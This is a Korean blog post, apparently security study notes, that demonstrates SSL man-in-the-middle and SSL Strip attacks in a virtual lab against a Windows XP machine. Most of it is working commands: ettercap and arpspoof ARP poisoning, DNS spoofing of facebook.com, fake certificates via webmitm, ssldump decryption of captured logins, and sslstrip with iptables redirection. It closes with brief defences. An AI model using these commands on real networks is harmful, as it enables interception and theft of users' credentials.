SSL STRIP
Client-Server간 암호화 통신을 위해 SSL이 적용된 경우에는 공격자가 중간에서 통신을 가로채더라도
그 내용을 해독할 수 없기 때문에 MITM 공격이 불가능하다.
그러나 최초 서버와의 세션 연결시 HTTPS를 강제로 HTTP 통신을 하게끔 만들수만 있다면,
일반적인 MITM 공격으로 트래픽 내용을 훔쳐볼 수 있다.
이것을 SSL Strip 기법이며, 말 그대로 “SSL을 벗겨내서(Strip)” 강제로 HTTP통신을 하게끔 유도하는 기법이다.
SSL Strip 공격은 2009BlackHat DC 컨퍼런스에서 Moxie Marlinspike에 의해 처음 소개되었다.
[출처]http://noplanlife.com/?p=1418
 
SSL MITM 상황 만들기
https://www.facebook.com/

1.MITM 상황 만들기
2.NS Spoof *.facebook.*
3.가짜 인증서 만들기
4.xp에서 facebook접근
기관,날짜,접근싸이트가 맞아야 한다.
인증기관이 문제이다.
5.wireshark로 패킷 캡처 -> 저장 -> type(libpcap)
6.ssldump
 
MITM 상황 만들기
XP : VMnet 8(192.168.1.129 gateway 192.168.1.2)
BT : VMnet 8(192.168.1.134 gateway 192.168.1.2)

BT설정
root@bt:~# ettercap -T -M arp /192.168.1.129/ /192.168.1.2/
//중간자 공격을 준비
root@bt:~# cd dns
root@bt:~/dns# vi dnsspoof.host

wq 저장하고 빠져나오기
root@bt:~/dns# dnsspoof -i eth0 -f dnsspoof.host
//DNS Spoofing
 
root@bt:~# webmitm -d

가짜 인증서를 만든다.
 
XP 확인

nslookup 명령어로 www.facebook.com 쳤을 때 BTIP가 나오는지 확인
 
이후 explorewww.facebook.com으로 접속한다.
인증서경고가 나오는데 확인을 눌러 무시하고 진행한다.

아이디와 비밀번호(기억할 수 있는 아이디, 가상의 ID)를 친다.
 
 
BT에서 패킷캡쳐

 

와이어샤크 캡처를 중지하고 위와 같이 저장한다.
저장시 libpcap 두 번째 타입으로 저장한다.
 
이후 캡처한 파일을 가짜인증서가 위치한 곳으로 옮긴다.
root@bt:/# mv ./test ~/dns/
root@bt:/# cd ~
root@bt:~# cd dns
root@bt:~/dns# ls
dnsspoof.host test webmitm.crt
root@bt:~/dns# ssldump -d -k webmitm.crt -r test > test.cap
root@bt:~/dns#cat test.cap | grep mana

위와 같이 입력한 값들을 확인할 수 있다.
ssldump옵션 :
-r : dumpfile
-i : interface
-k : keyfile
-p : password
-d : dump(덤프하겠다.)
     
SSL STRIP
STRIP: 벗겨내다, HTTPS 디캡슐레이션
강제로 암호화 프로토콜을 해제하는 것
 
 
root@bt:~# cd /pentest/web/sslstrip/
//위의 경로로 이동
 
실행단계 :
1.커널포워딩
2.포트포워딩
3.SSLSTRIP 실행
4.ARP Spoofing 실행

root@bt:/pentest/web/sslstrip# cat README
 

root@bt:/pentest/web/sslstrip# echo 1 > /proc/sys/net/ipv4/ip_forward
root@bt:/pentest/web/sslstrip# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
//README2번째 iptables 부분부터 복사를 하고 뒤에 8080포트를 적어준다.
root@bt:/pentest/web/sslstrip# python sslstrip.py -l 8080 -w strip.txt -a
root@bt:~/dns# arpspoof -i eth0 -t 192.168.1.129 192.168.1.2
 
XP
www.facebook.com 으로 접근
   

https -> http로 풀려버린다.
 
국세청 사이트 적용
https://www.nts.go.kr/

방어방법
1.MITM을 상황을 만들지 않으면 된다.
2.포트시큐리티 사용
3.이중 암호화

'정보보안 > Network' 카테고리의 다른 글

SSL Negotiation(버전 다운그레이드)  (487) 2020.08.02
PBR(정책기반 라우팅), Tunneling  (333) 2020.08.02
DNS Spoofing,파밍  (383) 2020.08.02
DHCP Starvation 공격(DOS공격 중 하나)  (312) 2020.08.02
DHCP Spoofing  (357) 2020.08.02

+ Recent posts

티스토리툴바